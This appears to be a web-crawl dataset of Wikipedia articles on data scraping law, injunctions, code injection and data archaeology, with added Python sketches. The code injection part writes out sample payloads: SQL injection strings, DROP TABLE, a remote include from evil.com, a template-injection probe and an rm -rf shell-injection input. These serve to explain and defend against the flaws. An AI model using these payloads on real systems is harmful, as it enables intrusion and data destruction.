16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to reconsider in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
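Commonly cited countermeasures include publishing a robots.txt policy and rate limiting aggressive clients. As a scraper-side counterpart, the sketch below checks robots.txt with the standard-library urllib.robotparser and pauses between requests; the URLs and user-agent string are hypothetical placeholders.
import time
import requests
from urllib.robotparser import RobotFileParser

base = "https://example.com"
rp = RobotFileParser()
rp.set_url(base + "/robots.txt")
rp.read()                                     # download and parse the site's robots.txt

pages = [base + "/page1", base + "/page2"]
for url in pages:
    if not rp.can_fetch("ExampleBot", url):   # skip paths the site disallows
        print("Disallowed by robots.txt:", url)
        continue
    response = requests.get(url, headers={"User-Agent": "ExampleBot"}, timeout=10)
    print(url, response.status_code)
    time.sleep(2)                             # simple rate limit between requests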
271 | https://en.wikipedia.org/wiki/Data_scraping | https://en.m.wikipedia.org/w/index.php?title=Data_scraping&mobileaction=toggle_view_mobile | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
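The Telnet-based screen scraper described above can be sketched in a few lines of Python using the standard-library telnetlib module (deprecated in recent releases and removed in Python 3.13); the host name, prompts, credentials, and report command are hypothetical placeholders for a real legacy system.
import re
import telnetlib

HOST = "legacy.example.com"            # hypothetical legacy host

tn = telnetlib.Telnet(HOST, 23, timeout=30)
tn.read_until(b"login: ")
tn.write(b"operator\n")                # emulate the keystrokes a human would type
tn.read_until(b"Password: ")
tn.write(b"secret\n")
tn.write(b"SHOW BALANCE 12345\n")      # navigate the old text interface
tn.write(b"exit\n")

screen = tn.read_all().decode("ascii", errors="replace")
# Extraction step: pull the figure of interest out of the captured display output.
match = re.search(r"BALANCE:\s*([\d,.]+)", screen)
print(match.group(1) if match else "balance not found")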
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
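As a minimal sketch of report mining in the spirit of the paragraph above, the following Python snippet parses a spooled, human-readable text report with a regular expression and loads the rows into a pandas DataFrame; the report layout is invented purely for illustration.
import re
import pandas as pd

# A fragment of a hypothetical spooled report, as it might appear in a print file.
report = """DAILY SALES REPORT            PAGE 1
ITEM      QTY     AMOUNT
Widget     12     240.00
Gadget      3      89.50
"""

rows = re.findall(r"^(\w+)\s+(\d+)\s+([\d.]+)\s*$", report, flags=re.MULTILINE)
df = pd.DataFrame(rows, columns=["item", "qty", "amount"])
df["qty"] = df["qty"].astype(int)
df["amount"] = df["amount"].astype(float)
print(df)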
272 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Injunction | An injunction is an equitable remedy a in the form of a special court order that compels a party to do or refrain from specific acts. 1 "When a court employs the extraordinary remedy of injunction, it directs the conduct of a party, and does so with the backing of its full coercive powers. 2 A party that fails to comply with an injunction faces criminal or civil penalties, including possible monetary sanctions and even imprisonment. They can also be charged with contempt of court. The injunction is an equitable remedy, 3 that is, a remedy that originated in the English courts of equity. Like other equitable remedies, it has traditionally been given when a wrong cannot be effectively remedied by an award of money damages. (The doctrine that reflects this is the requirement that an injunction can be given only when there is "no adequate remedy at law. ) Injunctions are intended to make whole again someone whose rights have been violated. Nevertheless, when deciding whether to grant an injunction, courts also take into account the interests of non-parties (that is, the public interest). When deciding whether to give an injunction, and deciding what its scope should be, courts give special attention to questions of fairness and good faith. One manifestation of this is that injunctions are subject to equitable defenses, such as laches and unclean hands. 4 Injunctions are given in many different kinds of cases. They can prohibit future violations of the law, such as trespass to real property, infringement of a patent, or the violation of a constitutional right (e.g., the free exercise of religion). Or they can require the defendant to repair past violations of the law. An injunction can require someone to do something, like clean up an oil spill or remove a spite fence. Or it can prohibit someone from doing something, like using an illegally obtained trade secret. An injunction that requires conduct is called a "mandatory injunction. An injunction that prohibits conduct is called a "prohibitory injunction. 5 Many injunctions are both—that is, they have both mandatory and prohibitory components, because they require some conduct and forbid other conduct. When an injunction is given, it can be enforced with equitable enforcement mechanisms such as contempt. 6 It can also be modified or dissolved (upon a proper motion to the court) if circumstances change in the future. 7 These features of the injunction allow a court granting one to manage the behavior of the parties. That is the most important distinction between the injunction and another non-monetary remedy in American law, the declaratory judgment. 8 Another way these two remedies are distinguished is that the declaratory judgment is sometimes available at an earlier point in a dispute than the injunction. 8 In the state of New South Wales, a court may grant an apprehended violence order (AVO) to a person who fears violence, harassment, abuse, or stalking. 9 The order prohibits the defendant from assaulting, harassing, threatening, stalking, or intimidating the person seeking the order. Other conditions may be included, such as a prohibition against contacting the person or attempting to find the person online. 10 A court may issue the order if it believes a person has reasonable grounds for their fears or has no reasonable grounds for their fears. Non-compliance may result in the imposition of a fine, imprisonment, or both, and deportation. 
Interim injunctions are a provisional form of injunctive relief, which can compel a party to do something (mandatory injunction) or stop it from doing something (prohibitory injunction). 11 A plaintiff seeking an interim injunction must establish that he is likely to succeed on the merits, that he is likely to suffer severe harm in the absence of preliminary relief, and that an injunction is in the public interest. 12 In Turkish law, interim injunction is an extraordinary remedy that is never awarded as of right. In each case, courts balance the competing claims of injury and consider the likely hardship on the defendant. 11 Injunctions have been especially important at two moments in American history. First, in the late nineteenth and early twentieth century, federal courts used injunctions to break strikes by unions. For example, after the United States government successfully used an injunction to outlaw the Pullman boycott in 1894 in In re Debs, employers found that they could obtain federal court injunctions to ban strikes and organizing activities of all kinds by unions. These injunctions were often extremely broad; one injunction issued by a federal court in the 1920s effectively barred the United Mine Workers of America from talking to workers who had signed yellow dog contracts with their employers. Unable to limit what they called "government by injunction" in the courts, labor and its allies persuaded the United States Congress in 1932 to pass the Norris-LaGuardia Act, which imposed so many procedural and substantive limits on the federal courts' power to issue injunctions that it effectively prohibited federal court from issuing injunctions in cases arising out of labor disputes. A number of states followed suit and enacted "Little Norris-LaGuardia Acts" that imposed similar limitations on state courts' powers. The courts have since recognized a limited exception to the Norris-LaGuardia Act's strict limitations in those cases in which a party seeks injunctive relief to enforce the grievance arbitration provisions of a collective bargaining agreement. Second, injunctions were crucial to the second half of the twentieth century in the desegregation of American schools. Federal courts gave injunctions that carried out the command of Brown v Board of Education to integrate public schools in the United States, and at times courts took over the management of public schools in order to ensure compliance. (An injunction that puts a court in the position of taking over and administering an institution—such as a school, a prison, or a hospital—is often called a "structural injunction".) Injunctions remain widely used to require government officials to comply with the Constitution, and they are also frequently used in private law disputes about intellectual property, real property, and contracts. Many state and federal statutes, including environmental statutes, civil rights statutes and employment-discrimination statutes, are enforced with injunctions. Injunctions in the United States tend to come in three main forms: temporary restraining orders, preliminary injunctions and permanent injunctions. 13 For both temporary restraining orders and preliminary injunctions, the goal is usually to preserve the status quo until the court is able to decide the case. A special kind of injunction that may be issued before trial is called a "temporary restraining order" or TRO. A TRO may be issued without notice to the other party or a hearing. 
A TRO will be given only for a short period of time before a court can schedule a hearing at which the restrained person may appear and contest the order. If the TRO is contested, the court must decide whether to issue a preliminary injunction. Temporary restraining orders are often, but not exclusively, given to prevent domestic violence, stalking, sexual assault, or harassment. Preliminary injunctions are given before trial. Because they are issued at an early stage, before the court has heard the evidence and made a decision in the case, they are more rarely given. The requirements for a preliminary injunction tend to be the same as for a permanent injunction, with the additional requirement that the party asking for the injunction is likely to succeed on the merits. 14 Permanent injunctions are issued after trial. Different federal and state courts sometimes have slightly different requirements for obtaining a permanent injunction. The Supreme Court enumerated the traditional four-factor test in eBay Inc. v. MercExchange, L.L.C. as: 15 16 The balance of hardships inquiry is also sometimes called the "undue hardship defense". 17 A stay pending appeal is a mechanism allowing a losing party to delay enforcement of an injunction while appeal is pending after final judgment has been granted by a lower court. 18 : 871 The DOJ and the FTC have investigated patent holders in the United States for seeking preliminary injunctions against accused infringers of standard-essential patents, or patents that the patent holder must license on reasonable and non-discriminatory terms. 19 There is an ongoing debate among legal and economic scholars with major implications for antitrust policy in the United States as well as in other countries over the statutory limits to the patent holder's right to seek and obtain injunctive relief against infringers of standard-essential patents. 20 Citing concerns of the absence of competition facing the patent holder once its technology is locked-in to the standard, some scholars argue that the holder of a standard-essential patent should face antitrust liability when seeking an injunction against an implementer of a standard. 21 Other scholars assert that patent holders are not contractually restrained from pursuing injunctions for standard-essential patent claims and that patent law is already capable of determining whether an injunction against an infringer of standard-essential patents will impose a net cost on consumers, thus obviating the role of antitrust enforcement. 22 Interim injunctions or interim orders are granted as a means of providing interim relief while a case is being heard, to prevent actions being implemented which potentially may be barred by a final ruling. 23 In England and Wales, injunctions whose existence and details may not be legally reported, in addition to facts or allegations which may not be disclosed, have been issued; they have been informally dubbed "super-injunctions". 24 25 An example was the super-injunction raised in September 2009 by Carter-Ruck solicitors on behalf of oil trader Trafigura, prohibiting the reporting of an internal Trafigura report into the 2006 Ivory Coast toxic waste dump scandal. The existence of the super-injunction was revealed only when it was referred to in a parliamentary question that was subsequently circulated on the Internet (parliamentary privilege protects statements by MPs in Parliament which would otherwise be held to be in contempt of court). 
Before it could be challenged in court, the injunction was varied to permit reporting of the question. 26 By long legal tradition, parliamentary proceedings may be reported without restriction. 27 Parliamentary proceedings are covered by absolute privilege, but the reporting of those proceedings in newspapers is only covered by qualified privilege. Another example of the use of a super-injunction was in a libel case in which a plaintiff who claimed he was defamed by family members in a dispute over a multimillion-pound family trust obtained anonymity for himself and for his relatives. 28 Roy Greenslade credits the former editor of The Guardian, Alan Rusbridger, with coining the word "super-injunction" in an article about the Trafigura affair in September 2009. 29 The term "hyper-injunction" has also been used to describe an injunction similar to a super-injunction but also including an order that the injunction must not be discussed with members of Parliament, journalists, or lawyers. One known hyper-injunction was obtained at the High Court in 2006, preventing its subject from saying that paint used in water tanks on passenger ships can break down and release potentially toxic chemicals. 30 This example became public knowledge in Parliament under parliamentary privilege. 31 By May 2011, Private Eye claimed to be aware of 53 super-injunctions and anonymised privacy injunctions, 32 though Lord Neuberger's report into the use of super-injunctions revealed that only two super-injunctions had been granted since January 2010. Many media sources were wrongly describing all gagging orders as super-injunctions. 33 The widespread media coverage of super-injunctions led to a drop in numbers after 2011; however four were granted in the first five months of 2015. 34 Injunctions defined by the European Commission as injunctions which can be issued for instance in cases in which materially the same website becomes available immediately after issuing the injunction with a different IP address or URL and which is drafted in a way that allows to also cover the new IP address or URL without the need for a new judicial procedure to obtain a new injunction. 35 An injunction described by the European Commission as allowing the repeated blocking of a website every time a live broadcast is in progress. These injunctions are generally used during live sporting events. 35 |
273 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Code_injection | Code injection is a class of computer security exploits in which a vulnerable computer program is tricked into misinterpreting external data as part of its code. An attacker thereby introduces (or "injects") code into the program and changes the course of its execution. The result of successful code injection can be disastrous, for example, by allowing computer viruses or computer worms to propagate. Code injection vulnerabilities occur when an application sends untrusted data to an interpreter. Injection flaws are most often found in SQL, LDAP, XPath, NoSQL queries, OS commands, XML parsers, SMTP headers, program arguments, etc. Injection flaws tend to be easier to discover when examining source code than via testing. 1 Scanners and fuzzers can help find injection flaws. 2 Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover. Certain types of code injection are errors in interpretation, giving special meaning to user input. Similar interpretation errors exist outside the world of computer science such as the comedy routine "Who's on First? . In the routine, there is a failure to distinguish proper names from regular words. Likewise, in some types of code injection, there is a failure to distinguish user input from system commands. Code injection techniques are popular in system hacking or cracking to gain information, privilege escalation or unauthorized access to a system. Code injection can be used malevolently for many purposes, including: Code injection attacks in Internet of Things could also lead to severe consequences like data breaches and service disruption. 3 In 2008, 5.66% of all vulnerabilities reported that year were classified as code injection, the highest year on record. In 2015, this had decreased to 0.77%. 4 Code injection may be used with good intentions; for example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without any malicious intent. 5 6 Code injection could, for example: Some users may unsuspectingly perform code injection because input they provide to a program was not considered by those who originally developed the system. For example: Another benign use of code injection could be the discovery of injection flaws themselves, with the intention of fixing these flaws. This is known as a white hat penetration test. To prevent code injection problems, utilize secure input and output handling, such as: The solutions listed above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injection of user code on the user machine, resulting in privilege elevation attacks. Some approaches that are used to detect and isolate managed and unmanaged code injections are: SQL injection takes advantage of the syntax of SQL to inject malicious commands that can read or modify a database, or compromise the meaning of the original query. 13 For example, consider a web page that has two fields to allow users to enter a user name and a password. The code behind the page will generate a SQL query to check the password against the list of user names: If this query returns any rows, then access is granted. 
However, if the malicious user enters a valid Username and injects some valid code (password' OR '1'='1) in the Password field, then the resulting query will look like this: In the example above, "Password" is assumed to be blank or some innocuous string. '1'='1' will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run, or even to load up and run external programs. Assume a query with the following format: If an adversary has the following for inputs: UserID: ';DROP TABLE User; -- and Password: 'OR" the query will be parsed to be: The result is that the table User will be removed from the database. This occurs because the ; symbol signifies the end of one command and the start of a new one, and the -- sequence signifies the start of a comment. Code injection is the malicious injection or introduction of code into an application. Some web servers have a guestbook script, which accepts small messages from users, and typically receives messages such as: However, a malicious person may know of a code injection vulnerability in the guestbook, and enters a message such as: If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code. HTML and script injection is a popular subject, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions of what input data is possible, or the effects of special data. 14 Template engines are often used in modern Web applications to display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities 15 such as Server-Side Template Injections. While this vulnerability is similar to cross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page. The example below shows the concept. Here the template placeholder for the visitor's name is replaced with data during the rendering process. An attacker can use this workflow to inject code into the rendering pipeline by providing a malicious visitor name. Depending on the implementation of the web application, he could choose to inject {{7*'7'}}, which the renderer could resolve to Hello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable to remote code execution. An eval() injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. 16 The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo". PHP allows serialization and deserialization of whole objects. If untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks. 17 Such an attack on Joomla was found in 2013. 
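The SQL and template injection patterns described in this section can be reproduced in Python. The first part of the sketch below shows the classic ' OR '1'='1 bypass against a query built by string concatenation, and the parameterized alternative, using the standard-library sqlite3 module; the second part shows a server-side template injection with the Jinja2 library (assumed to be installed), where {{7*'7'}} is evaluated by the renderer.
import sqlite3
from jinja2 import Template

# --- SQL injection ---------------------------------------------------------
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE users (username TEXT, password TEXT)")
cur.execute("INSERT INTO users VALUES ('alice', 'secret')")

username, password = "alice", "wrong' OR '1'='1"
# Vulnerable: attacker-controlled text becomes part of the SQL statement itself.
unsafe = ("SELECT * FROM users WHERE username = '%s' AND password = '%s'"
          % (username, password))
print(cur.execute(unsafe).fetchall())        # row returned despite the wrong password
# Safe: a parameterized query treats the input purely as data.
safe = "SELECT * FROM users WHERE username = ? AND password = ?"
print(cur.execute(safe, (username, password)).fetchall())   # []

# --- Server-side template injection ----------------------------------------
visitor_name = "{{7*'7'}}"
# Vulnerable: the user input is concatenated into the template source.
print(Template("Hello " + visitor_name).render())            # Hello 7777777
# Safe: the input is passed as data to a fixed template.
print(Template("Hello {{ name }}").render(name=visitor_name))  # printed literally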
18 Consider this PHP program (which includes a file specified by request): The example might be read as only color-files like blue.php and red.php could be loaded, while attackers might provide COLOR=http://evil.com/exploit, causing PHP to load the external file. Format string bugs most commonly appear when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider the following short C program that has a local variable char array password which holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string. If the user input is filled with a list of format specifiers such as %s%s%s%s%s%s%s%s, then printf() will start reading from the stack. Eventually, one of the %s format specifiers will access the address of password, which is on the stack, and print Password1 to the screen. Shell injection (or command injection 19 ) is named after Unix shells, but applies to most systems which allow software to programmatically execute a command line. Here is an example vulnerable tcsh script: If the above is stored in the executable file ./check, the shell command ./check " 1 ) evil" will attempt to execute the injected shell command evil instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter in order to defend against an attack. 20 Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are system(), StartProcess(), and System.Diagnostics.Process.Start(). Client-server systems such as web browser interaction with web servers are potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program called funnytext to replace a word the user sent with some other word. The passthru in the above composes a shell command that is then executed by the web server. Since part of the command it composes is taken from the URL provided by the web browser, this allows the URL to inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features (this list is not exhaustive): 21 Some languages offer functions to properly escape or quote strings that are used to construct shell commands: However, this still puts the burden on programmers to know or learn about these functions and to remember to make use of them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to use APIs that execute external programs directly, rather than through a shell, thus preventing the possibility of shell injection. However, these APIs tend not to support various convenience features of shells, and/or to be more cumbersome or verbose compared to concise shell syntax. |
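The closing advice above, preferring APIs that run a program directly over ones that go through a shell, looks like this in Python on a POSIX system; the malicious input is a hypothetical example, and the commented-out line is the vulnerable pattern being avoided.
import shlex
import subprocess

word = "hello; rm -rf /tmp/important"      # hypothetical malicious input
# Vulnerable: the string is handed to a shell, so ';' starts a second command.
# subprocess.run("echo " + word, shell=True)

# Safer, if a shell really is required: quote the untrusted piece first.
subprocess.run("echo " + shlex.quote(word), shell=True)

# Safest: call the program directly with an argument list; no shell is involved,
# so shell metacharacters in the input have no special meaning.
subprocess.run(["echo", word])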
274 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_archaeology | There are two conceptualisations of data archaeology, the technical definition and the social science definition. Data archaeology (also data archeology) in the technical sense refers to the art and science of recovering computer data encoded and/or encrypted in now obsolete media or formats. Data archaeology can also refer to recovering information from damaged electronic formats after natural disasters or human error. It entails the rescue and recovery of old data trapped in outdated, archaic or obsolete storage formats such as floppy disks, magnetic tape and punch cards, and transferring that data to more usable formats. Data archaeology in the social sciences usually involves an investigation into the source and history of datasets and the construction of these datasets. It involves mapping out the entire lineage of data, its nature and characteristics, its quality and veracity and how these affect the analysis and interpretation of the dataset. The findings of performing data archaeology affect the level to which the conclusions drawn from data analysis can be trusted. 1 The term data archaeology originally appeared in 1993 as part of the Global Oceanographic Data Archaeology and Rescue Project (GODAR). The original impetus for data archaeology came from the need to recover computerised records of climatic conditions stored on old computer tape, which can provide valuable evidence for testing theories of climate change. These approaches allowed the reconstruction of an image of the Arctic that had been captured by the Nimbus 2 satellite on September 23, 1966, in higher resolution than ever seen before from this type of data. 2 NASA also utilises the services of data archaeologists to recover information stored on 1960s-era vintage computer tape, as exemplified by the Lunar Orbiter Image Recovery Project (LOIRP). 3 There is a distinction between data recovery and data intelligibility. One may be able to recover data but not understand it. For data archaeology to be effective, the data must be intelligible. 4 A term closely related to data archaeology is data lineage. The first step in performing data archaeology is an investigation into the data lineage. Data lineage entails the history of the data, its source and any alterations or transformations it has undergone. Data lineage can be found in the metadata of a dataset, the paradata of a dataset or any accompanying identifiers (methodological guides, etc.). With data archaeology comes methodological transparency, which is the level to which the data user can access the data history. The level of methodological transparency available determines not only how much can be recovered, but also assists in knowing the data. Data lineage investigation involves what instruments were used, what the selection criteria are, the measurement parameters and the sampling frameworks. 1 In the socio-political sense, data archaeology involves the analysis of data assemblages to reveal their discursive and material socio-technical elements and apparatuses. This kind of analysis can reveal the politics of the data being analysed and thus that of their producing institution. Archaeology in this sense refers to the provenance of data. It involves mapping the sites, formats and infrastructures through which data flows and is altered or transformed over time. 
It has an interest in the life of data, and the politics that shape the circulation of data. This serves to expose the key actors, practices and praxes at play and their roles. It can be accomplished in two steps. First is accessing and assessing the technical stack of the data (this refers to the infrastructure and material technologies used to build and gather the data) in order to understand the physical representation of the data. Second is analysing the contextual stack of the data, which shapes how the data is constructed, used and analysed. This can be done via a variety of processes: interviews, analysing technical and policy documents, and investigating the effect of the data on a community or its institutional, financial, legal and material framing. This can be attained by creating a data assemblage. 1 Data archaeology charts the way data moves across different sites and can sometimes encounter data friction. 5 Data archaeologists can also use data recovery after natural disasters such as fires, floods, earthquakes, or even hurricanes. For example, in 1995, during Hurricane Marilyn, the National Media Lab assisted the National Archives and Records Administration in recovering data at risk due to damaged equipment. The hardware was damaged from rain, salt water, and sand, yet it was possible to clean some of the disks and refit them with new cases, thus saving the data within. 4 When deciding whether or not to try and recover data, the cost must be taken into account. If there is enough time and money, most data can be recovered. In the case of magnetic media, which are the most common type used for data storage, there are various techniques that can be used to recover the data depending on the type of damage. 4 : 17 Humidity can cause tapes to become unusable as they begin to deteriorate and become sticky. In this case, a heat treatment can be applied to fix this problem, by causing the oils and residues to either be reabsorbed into the tape or evaporate off the surface of the tape. However, this should only be done in order to provide access to the data so it can be extracted and copied to a medium that is more stable. 4 : 17 18 Lubrication loss is another source of damage to tapes. This is most commonly caused by heavy use, but can also be a result of improper storage or natural evaporation. As a result of heavy use, some of the lubricant can remain on the read-write heads, which then collect dust and particles. This can cause damage to the tape. Loss of lubrication can be addressed by re-lubricating the tapes. This should be done cautiously, as excessive re-lubrication can cause tape slippage, which in turn can lead to media being misread and the loss of data. 4 : 18 Water exposure will damage tapes over time. This often occurs in a disaster situation. If the media is in salty or dirty water, it should be rinsed in fresh water. The process of cleaning, rinsing, and drying wet tapes should be done at room temperature in order to prevent heat damage. Older tapes should be recovered prior to newer tapes, as they are more susceptible to water damage. 4 : 18 The next step (after investigating the data lineage) is to establish what counts as good data and bad data to ensure that only the 'good' data gets migrated to the new data warehouse or repository. A good example of bad data, in the technical sense, is test data. To prevent the need for data archaeology, creators and holders of digital documents should take care to employ digital preservation. 
